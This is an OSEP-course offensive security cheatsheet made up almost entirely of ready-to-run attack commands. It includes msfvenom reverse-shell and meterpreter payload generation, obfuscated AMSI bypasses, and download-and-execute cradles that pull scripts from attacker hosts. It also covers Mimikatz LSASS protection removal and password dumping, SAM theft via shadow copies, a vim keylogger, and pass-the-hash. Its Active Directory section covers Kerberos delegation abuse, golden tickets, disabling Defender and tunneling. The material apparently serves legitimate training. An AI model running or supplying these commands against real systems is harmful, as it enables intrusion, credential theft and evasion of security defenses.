A cheatsheet with useful commands used during my OSEP course.
Payloads
Multi handler oneliner with custom certificate
msfconsole -q -x 'use multi/handler; set payload windows/x64/meterpreter/reverse_https; set HandlerSSLCert /home/kali/worstenbrood.pem; set lhost 192.168.49.92; set lport 443; run'
EXE
sudo msfvenom -p windows/shell_reverse_tcp LHOST=192.168.1.1 LPORT=444 -f exe -o /var/www/html/shell.exe
VBA
msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=443 EXITFUNC=thread -f vbapplication
CSharp SharpShooter payload (edit file after creation, remove first line and brackets)
msfvenom -a x64 -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=443 EnableStageEncoding=True PrependMigrate=True -f csharp -o /var/www/html/payload.txt
DLL (for rundll32)
msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=443 -f dll -o data/exploit.dll
Python
msfvenom -p python/meterpreter/reverse_https LHOST=192.168.1.1 LPORT=443 -f raw -o data/shell.py
ELF
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=443 EXITFUNC=thread -f elf -o /var/www/html/met.elf
DotNetToJscriptDirectly
DotNetToJScript.exe ExampleAssembly.dll --lang=VBScript --ver=v4 -o runner.vbs
JS through SharpShooter
python SharpShooter.py --payload js --dotnetver 4 --stageless --rawscfile /var/www/html/shell.txt --output test
python SharpShooter.py --payload js --dotnetver 2 --scfile /var/www/html/payload.txt --output test --delivery web --web http://192.168.1.1/output/test.payload --smuggle --template mcafee --shellcode
HTA through SharpShooter
python2 SharpShooter.py --payload hta --rawscfile ~/sharpshooter.raw --dotnetver 2 --output test --stageless
Domain fronting meterpreter
msfvenom -p windows/x64/meterpreter/reverse_http LHOST=do.skype.com LPORT=80 HttpHostHeader=cdn.azureedge.net -f exe > http-df.exe
set LHOST do.skype.com
set OverrideLHOST do.skype.com
set OverrideRequestHost true
set HttpHostHeader offensive-security.azureedge.net
run -j
AMSI
Hooking with Frida
frida-trace -p 3532 -x amsi.dll -i Amsi*
Bypasses
[Ref].Assembly.GetType('System.Management.Automation.Ams'+'iUtils').GetField('ams'+'iInitFailed','NonPublic,Static').SetValue($null,$true)
$a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like "*iUtils") {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like "*Context") {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf=@(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);
$ananas=[Ref].Assembly.GetTypes();Foreach($banana in $ananas) {if ($banana.Name -like "*iU"+"tils") {$cherry=$banana}};$py=$cherry.GetFields('NonPublic,Static');Foreach($ello in $py) {if ($ello.
Name -like "*Context") {$ll=$ello}};$j=$ll.GetValue($null);[IntPtr]$ptr=$j;[Int32[]]$buf=@(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);
Inject AMSI bypass remotely
(new-object system.net.webclient).downloadstring('http://192.168.1.1/amsi.txt') | IEX
PowerShell v2 (no amsi)
powershell -version 2 -command "IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.1/run.txt')"
WinDbg
lm m amsi (check if amsi module is loaded)
sxe ld amsi (breakpoint on loading of amsi module)
Execute
Powershell one-liner (base64 payload)
$text = "(New-Object System.Net.WebClient).DownloadString('http://192.168.1.1/run.txt') | IEX"
$bytes = [System.Text.Encoding]::Unicode.GetBytes($text)
$EncodedText = [Convert]::ToBase64String($bytes)
$EncodedText
powershell -enc KAB...
WMIC
wmic process get brief /format:"http://192.168.1.1/payload.xsl"
Microsoft.Workflow.Compiler
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe run.xml results.xml
Run.xml
using System;
using System.Workflow.ComponentModel;
public class Run : Activity{
public Run() {
Console.WriteLine("I executed!");
}
}
installutil
bitsadmin /Transfer myJob http://192.168.1.1/payload.txt C:\users\student\enc.txt && certutil -decode C:\users\student\enc.txt C:\users\student\Bypass.exe && del C:\users\student\enc.txt && C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=false /U C:\users\student\Bypass.exe
rundll32
rundll32 test.dll,run
rundll32 shell32.dll,Control_RunDLL C:\Users\student\exploit.dll (msf payload)
Alternate Data stream
type Desktop\jscript.js > "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:test2.js
wscript "C:\Program Files (x86)\TeamViewer\TeamViewer12_Logfile.log:test2.js"
HTA shortcut
C:\Windows\System32\mshta.exe http://192.168.1.1/payload.hta
PowerShell with error printing
powershell -Command wget -Uri http://192.168.1.1:81/ -Method POST -Body $(powershell Invoke-WebRequest 'http://192.168.1.1/met.exe' -OutFile '%TEMP%\\met.exe')
Macro Shell with error printing
Dim str As String
str = "powershell -Command wget -Uri http://192.168.1.1:81/ -Method POST -Body $(powershell Invoke-WebRequest 'http://192.168.1.1/met.exe' -OutFile '%TEMP%\\met.exe')"
Shell str, vbHide
JScript shell with error printing
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("powershell -Command wget -Uri http://192.168.1.1:81/ -Method POST -Body $(powershell whoami)");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
Loading a driver through sc.exe
sc create mimidrv binPath= C:\inetpub\wwwroot\upload\mimidrv.sys type= kernel start= demand
sc start mimidrv
VBS get
Dim o
Set o = CreateObject("MSXML2.XMLHTTP")
o.open "GET", "http://192.168.1.1/fromvbs", False
o.send
JS get
var url = "http://192.168.1.1/fromjs"
var Object = WScript.CreateObject('MSXML2.XMLHTTP');
Object.Open('GET', url, false);
Object.Send();
BAT get
start "" http://192.168.1.1/frombat
Linux rev shell bash
curl 192.168.1.1/s.sh | bash
MSSQL
Query MSSQL servers
setspn -T <domain> -Q MSSQLSvc/*
. .\GetUserSPNs.ps1
xp_cmdshell
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami'
xp_dirtree
.\SQL.exe sql.domain.com msdb "EXEC master.sys.xp_dirtree '\\192.168.1.1\file', 1, 1;"
sp_OACreate and sp_OAMethod
EXEC sp_configure 'Ole Automation Procedures', 1; RECONFIGURE;
DECLARE @myshell INT; EXEC sp_oacreate 'wscript.shell', @myshell OUTPUT; EXEC sp_oamethod @myshell, 'run', null, 'cmd /c \"echo Test > C:\\Tools\\file.txt\"';
Exec on linked server
select * from openquery("SERVER", 'select USER_NAME()')
Custom assembly from file
use msdb
EXEC sp_configure 'show advanced options',1
RECONFIGURE
EXEC sp_configure 'clr enabled',1
RECONFIGURE
EXEC sp_configure 'clr strict security', 0
RECONFIGURE
CREATE ASSEMBLY myAssembly FROM 'c:\tools\cmdExec.dll' WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE [dbo].[cmdExec] @execCommand NVARCHAR (4000) AS EXTERNAL NAME [myAssembly].[StoredProcedures].[cmdExec];
EXEC cmdExec 'whoami'
Custom assembly from hex
CREATE ASSEMBLY my_assembly FROM 0x4D7A..... WITH PERMISSION_SET = UNSAFE;
Load PowerUpSQL
(new-object system.net.webclient).downloadstring('http://192.168.1.1/PowerUpSQL.ps1') | IEX
Get all accessible domain MSSQL’s
Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10
Enum database users
Audit SQL
Tunneling
DNSCAT
dnscat2-server tunnel.com
dnscat2-v0.07-client-win32.exe tunnel.com
listen 127.0.0.1:3389 172.16.51.21:3389
MSF autoroute
use multi/manage/autoroute
set session 1
exploit
use auxiliary/server/socks_proxy
set version 4a
set srvhost 127.0.0.1
exploit -j
bash -c 'echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf'
proxychains rdesktop 192.168.1.1
Chisel
./chisel server -p 8080 --socks5 << server
ssh -N -D 0.0.0.0:1080 localhost << server (tunnel)
chisel.exe client 192.168.1.1:8080 socks << client
PrivEsc
Load PowerUp
(new-object system.net.webclient).downloadstring('http://192.168.49.236/PowerUp.ps1') | IEX
Invoke-AllChecks
Load PrivEscCheck https://github.com/itm4n/PrivescCheck
(new-object system.net.webclient).downloadstring('http://192.168.49.236/PrivescCheck.ps1') | IEX
Invoke-PrivescCheck -Extended
Shadowcopies
wmic shadowcopy call create Volume='C:\'
vssadmin list shadows
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\sam C:\users\domain.com\Downloads\sam
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\system32\config\system C:\users\domain.com\Downloads\system
LAPS
(new-object system.net.webclient).downloadstring('http://192.168.1.1/LAPSToolkit.ps1') | IEX
Get-LAPSComputers (get all computers with labs, including pw)
Find-LAPSDelegatedGroups (users that are allowed to view pws)
Get-NetGroupMember -GroupName "LAPS Password Readers"
MSF
use post/windows/gather/credentials/enum_laps
View current privs
Spoolsample local exploit
upload C:\\Windows\\Tasks\\met.exe
impersonate.exe \\.\pipe\test\pipe\spoolss
SpoolSample.exe srv srv/pipe/test
Mimikatz remove PPL and dump pws
privilege::debug (enable priv)
!+ (load driver)
!processprotect /process:lsass.exe /remove (remove ppl protection)
sekurlsa::logonpasswords (dump pws)
Offline dump lsass
procdump.exe lsass.exe
sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords
Remotely load Invoke-Mimikatz
(new-object system.net.webclient).downloadstring('http://192.168.1.1/mimikatz.txt') | IEX
Invoke-Mimikatz remove PPL Protection
Invoke-Mimikatz -Command "`"!processprotect /process:lsass.exe /remove`""
Invoke-Mimikatz get passwords from minidump
Invoke-Mimikatz -Command "`"sekurlsa::minidump c:\tools\lsass.dmp`" sekurlsa::logonpasswords"
Invoke-Mimikatz remove ppl & dump passwords
Invoke-Mimikatz -Command "privilege::debug" !+ "!processprotect /process:lsass.exe /remove" sekurlsa::logonpasswords
Enable wdigest
HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest -> value "1"
VIM
.vimrc
~/.vim/plugin/<name>.vim
:silent !source ~/.vimrunscript
.bashrc
View sudo current user permissions
Open shell
Keylogger
:if $USER == "root"
:autocmd BufWritePost * :silent :w! >> /tmp/hackedfromvim.txt
:endif
Traversal
RDP
mstsc /admin (without disconnecting regular user)
mstsc /restrictedadmin (use current creds)
PTH
sekurlsa::pth /user:admin /domain:<domain> /ntlm:<ntlm> /run:"mstsc.exe /restrictedadmin"
sekurlsa::pth /user:admin /domain:<domain> /ntlm:<ntlm> /run:powershell
Enter-PSSession -Computer <hostname>
xfreerdp /u:admin /pth:<ntlm> /v:192.168.1.1 /cert-ignore
SharpRDP
SharpRDP.exe computername=srv command=notepad username=domain\willem password=lab
sharprdp.exe computername=srv command="powershell (New-Object System.Net.WebClient).DownloadFile('http://192.168.1.1/met.exe', 'C:\Windows\Tasks\met.exe'); C:\Windows\Tasks\met.exe" username=domain\willem password=lab
Fileless PTH
python3 scshell.py domain/[email protected] -hashes 00000000000000000000000000000000:00000000000000000000000000000000 -service-name SensorService
ControlMaster
ssh -S /home/user/.ssh/controlmaster/user\@linuxvictim\:22 user@linuxvictim
SSH-Agent
SSH_AUTH_SOCK=/tmp/ssh-7OgTFiQJhL/agent.16380 ssh user@linuxvictim
Ansible
ansible victims -a "whoami"
ansible victims -a "whoami" --become
Crackmapexec
crackmapexec smb 192.168.1.1 -d domain.com -u x -p h4x -x dir
--exec-method {mmcexec,wmiexec,smbexec,atexec}
Powershell remoting
crackmapexec winrm -d domain.com -u Administrator -p 'pass123' -x "whoami" 192.168.1.1
Pass the hash
crackmapexec smb 192.168.1.1 -d domain.com -u admin -H 11111111111111111111111111 -X dir
Use keytab of user
sudo cp /tmp/krb5cc_607000500_3aeIA5 /tmp/krb5cc_minenow
sudo chown user:user /tmp/krb5cc_minenow
ls -al /tmp/krb5cc_minenow
kdestroy
klist
export KRB5CCNAME=/tmp/krb5cc_minenow
klist
Use keytab with impacket
proxychains python3 /usr/share/doc/python3-impacket/examples/GetADUsers.py -all -k -no-pass -dc-ip 192.168.120.5 DOMAIN.COM/Administrator
proxychains python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py -k -no-pass -dc-ip 192.168.120.5 DOMAIN.COM/Administrator
proxychains python3 /usr/share/doc/python3-impacket/examples/psexec.py [email protected] -k -no-pass
Linux libraries
Compile lib LD_LIBRARY_PATH
gcc -Wall -fPIC -c -o hax.o hax.c
gcc -shared -o libhax.so hax.o
with map
gcc -Wall -fPIC -c -o hax.o hax.c
gcc -shared -Wl,--version-script gpg.map -o libgpg-error.so.0 hax.o
Compile lib LD_PRELOAD
gcc -Wall -fPIC -z execstack -c -o evil_geteuid.o preload.c
gcc -shared -o evil_geteuid.so evil_geteuid.o -ldl
export LD_PRELOAD=/home/offsec/evil_geteuid.so
cp /etc/passwd /tmp/testpasswd
Add to .bashrc
alias sudo="sudo LD_LIBRARY_PATH=/home/offsec/ldlib"
View loaded libs
Get symbols
readelf -s --wide /lib/x86_64-linux-gnu/libgpg-error.so.0 | grep FUNC | grep GPG_ERROR | awk '{print "int",$8}' | sed 's/@@GPG_ERROR_1.0/;/g'
Create version map
readelf -s --wide /lib/x86_64-linux-gnu/libgpg-error.so.0 | grep FUNC | grep GPG_ERROR | awk '{print $8}' | sed 's/@@GPG_ERROR_1.0/;/g'
Active Directory
Enum
View object ACL’s
(new-object system.net.webclient).downloadstring('http://192.168.1.1/powerview.ps1') | IEX
Get-ObjectAcl -Identity <username>
Get-ObjectAcl -Identity <username> -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_}
View all user objects access rights (GenericAll, WriteDACL)
Get-DomainUser | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
View all group objects access rights (GenericAll, WriteDACL)
Get-DomainGroup | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
Change ACL if WriteDACL is set on object
Add-DomainObjectAcl -TargetIdentity <target username/group> -PrincipalIdentity <username> -Rights All
Get interesting ACL’s
Invoke-ACLScanner -ResolveGUIDs
Unconstrained delegation
Get unconstrained delegation computers
Get-DomainComputer -Unconstrained
-Domain domain.com (optional to enum other domains in forest)
View and use forwardable tickets on unconstrained host
privilege::debug
sekurlsa::tickets
sekurlsa::tickets /export
kerberos::ptt <filename>
C:\Tools\SysinternalsSuite\PsExec.exe \\dc01 cmd
whoami
Check printer spooler service active on remote host
dir \\dc01\pipe\spoolss
ls \\dc01\pipe\spoolss
Rubeus monitor for incoming tickets filtered by host (run on Unconstrained delegation host)
Rubeus.exe monitor /interval:5 /filteruser:DC01$
Force remote host to connect to host
SpoolSample.exe DC01 TARGET01
Use ticket with Rubeus
Rubeus.exe ptt /ticket:<base64>
Force dcsync using mimikatz to get user hashes using injected ticket
lsadump::dcsync /domain:x.domain.com /user:x\krbtgt
lsadump::dcsync /domain:x.domain.com /user:x\administrator
Constrained delegation
Get constrained delegation computers
Get-DomainComputer -TrustedToAuth
-Domain d.com (optional to enum other domains in forest)
Generate a TGT for a user
.\Rubeus.exe asktgt /user:iissvc /domain:x.com /rc4:<hash>
S4U Constrained Delegation generate ticket for any domain user
.\Rubeus.exe s4u /ticket:doIE+jCCBP... /impersonateuser:administrator /msdsspn:mssqlsvc/dc01.domain.com:1433 /ptt
S4U Constrained Delegation generate ticket for any domain user for a alternative service on the same host
.\Rubeus.exe s4u /ticket:doIE+jCCBPag... /impersonateuser:administrator /msdsspn:mssqlsvc/dc01.domain.com:1433 /altservice:CIFS /ptt
PowerShell Remotely load rubeus
$data = (New-Object System.Net.WebClient).DownloadData('http://192.168.1.1/Rubeus.exe')
$assem = [System.Reflection.Assembly]::Load($data)
[Rubeus.Program]::Main("purge".Split())
[Rubeus.Program]::Main("s4u /user:host$ /rc4:x /impersonateuser:administrator /msdsspn:cifs/host$ /ptt".Split())
ls \\host\c$
Resource-Based Constrained Delegation
Get GenericWrite computers
Get-DomainComputer | Get-ObjectAcl -ResolveGUIDs | Foreach-Object {$_ | Add-Member -NotePropertyName Identity -NotePropertyValue (ConvertFrom-SID $_.SecurityIdentifier.value) -Force; $_} | Foreach-Object {if ($_.Identity -eq $("$env:UserDomain\$env:Username")) {$_}}
Get machine quota in the domain
Get-DomainObject -Identity prod -Properties ms-DS-MachineAccountQuota
Add computer using PowerMad
(new-object system.net.webclient).downloadstring('http://192.168.1.1/Powermad.ps1') | IEX
New-MachineAccount -MachineAccount myComputer -Password $(ConvertTo-SecureString 'h4x' -AsPlainText -Force)
Update msDS-AllowedToActOnBehalfOfOtherIdentity of ‘server’ object to newly created machine
$sid =Get-DomainComputer -Identity myComputer -Properties objectsid | Select -Expand objectsid
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($sid))"
$SDbytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDbytes,0)
Get-DomainComputer -Identity server | Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes}
Use computer account to generate ticket
.\Rubeus.exe s4u /user:myComputer$ /rc4:x /impersonateuser:administrator /msdsspn:CIFS/dc01.domain.com /ptt
Add computer using impacket
python3 /usr/share/doc/python3-impacket/examples/addcomputer.py -k -no-pass -computer-name 'rbcd$' -computer-pass 'Password12345' -dc-ip 1.1.1.1 DOMAIN/user -dc-host dc.domain.com
Update msDS-AllowedToActOnBehalfOfOtherIdentity of ‘server’ object to newly created machine using impacket
python3 rbcd.py -delegate-to 'HOST$' -delegate-from 'rbcd$' -action write -k -no-pass DOMAIN/user -debug
Get service ticket using impacket
python3 /usr/share/doc/python3-impacket/examples/getST.py -spn CIFS/HOST.DOMAIN.COM -impersonate 'Administrator' -dc-ip 1.1.1.1 'DOMAIN/rbcd$:Password12345'
Kerberoasting
PowerShell load assembly Rubeus from base64
[Convert]::ToBase64String([IO.File]::ReadAllBytes("C:\Temp\Rubeus.exe")) | Out-File -Encoding ASCII C:\Temp\rubeus.txt
$a = Get-Content .\rubeus.txt
$assem = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($a))
Export all available tickets
[Rubeus.Program]::Main("kerberoast /outfile:C:\temp\hashes.txt".Split())
Forest enum
Get trusted domains
nltest /trusted_domains
([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
Get-DomainTrust -API [-Domain anotherdomaininforest.com] (WIN32)
Get-DomainTrust [-Domain anotherdomaininforest.com] (LDAP)
Enumerate users in a trusted domain / forest with PowerView
Get-DomainUser -Domain domain.com
Enumerate groups in a trusted domain / forest with PowerView
Get-DomainGroup -Domain domain.com
Get users in Enterprise Admins group of root domain
Get-DomainGroupMember -Identity "Enterprise Admins" -Domain domain.com
Forest compromise
Dump KRBTGT
lsadump::dcsync /domain:d.x.com /user:d\krbtgt
Generate domain SID
Get-DomainSID -Domain d.x.com
Generate golden ticket with ExtraSides (obtaining Enterprise Admins role in trusted domain) <destination domain SID with "-519" appended>
kerberos::golden /user:h4x /domain:domain.com /sid:S-1-5x /krbtgt:x /sids:S-1-5-21-x-519 /ptt
Beyond forest enum
Get forest trusts
([System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()).GetAllTrustRelationships()
Get-ForestTrust
Get trusts to domains in other forest
Get-DomainTrust -Domain d.com
Get-DomainTrustMapping
Get users in other forest
Get-DomainUser -Domain d.com
Get group members of a group in another forest
Get-DomainForeignGroupMember -Domain d.com
Enable SID history (on target forest DC)
netdom trust d2.com /d:d1.com /enablesidhistory:yes
Enumeration
Enumerate Windows with HostRecon
(new-object system.net.webclient).downloadstring('http://192.168.1.1/HostRecon.ps1') | IEX
Invoke-HostRecon
Check if PPL Protection is enabled
Get-ItemProperty -Path HKLM:\SYSTEM\CurrentControlSet\Control\Lsa -Name "RunAsPPL"
Check if AppLocker is enabled
Get-ChildItem -Path HKLM:\SOFTWARE\Policies\Microsoft\Windows\SrpV2\Exe
Check PowerShell execution context
$ExecutionContext.SessionState.LanguageMode
Get loaded DLL’s
[appdomain]::currentdomain.getassemblies() | Sort-Object -Property fullname | Format-Table fullname
Windows Defender
Disable defender realtime montoring
Set-MpPreference -DisableRealtimeMonitoring $true
Defender get detection history
Defender remove signatures
MpCmdRun.exe -RemoveDefinitions -All
Defender settings
Other
View current Integrity
Rubeus Password to hash
.\Rubeus.exe hash /password:lab
Run CMD as other usr
Nmap through Proxychains
proxychains nmap -sT -Pn 192.168.1.1
Get NTLM from krb5.keytab file
./keytabextract.py krb5.keytab
Search fileshares
Invoke-ShareFinder -Verbose -Domain d
Find-DomainShare -CheckShareAccess
Find machines current user has local admin
View local admins on computer
Find-GPOComputerAdmin –Computername <ComputerName>
List GPO’s
Reset user PW through PowerView
Set-DomainUserPassword -Identity User -Verbose
Send mail with swaks
PowerSharpPack
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')
PowerSharpPack -Tokenvator -Command "getsystem powershell.exe"